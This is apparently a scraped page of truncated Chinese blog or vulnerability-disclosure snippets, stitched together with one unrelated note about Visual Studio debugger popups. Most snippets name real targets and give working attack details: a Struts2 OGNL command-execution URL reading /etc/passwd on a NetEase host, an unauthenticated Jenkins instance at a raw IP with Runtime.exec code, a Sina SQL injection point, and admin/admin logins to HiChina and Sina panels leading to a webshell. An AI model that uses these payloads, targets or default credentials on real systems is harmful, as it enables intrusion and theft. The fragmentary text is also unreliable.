网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
http://220.181.109.120:8080/ Jenkins平台,未授权访问,应该是奇艺的,看图: 还可以直接执行命令呢,继续深入的话可渗透内网(未授权不敢测试) Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); Buffered…
注入点: http://dota2db.games.sina.com.cn/?a=hero_info&id=10487
在安装完Visual Studio经常会遇到一个问题是,在打开IE或浏览网页的时候,都会出现iexplore.exe[XXXX]发生了未经处理的win32异常,还调Visual Studio用户要么启动实时调试,用户要么启动实时调试,要么忽略该异常.非常麻烦,网上也讲了好多解决办法,什么在visual studio(工具-选项-调试-实时-把右边那些本机\脚本\托管)这些钩都去掉等等,我试过了不还…
http://b131.demo.www.net.cn/admin/login.aspx 万网分销宝系统 用户名密码都是admin,进入后台可得shell ,如图 菜刀连接 同服很多分站,貌似都是测试模板
http://123.126.55.209:8000/ 新浪云主机托管平台SWS Service 用户名:admin 密码:admin 用火狐登陆进去可以点击查看相关信息,如图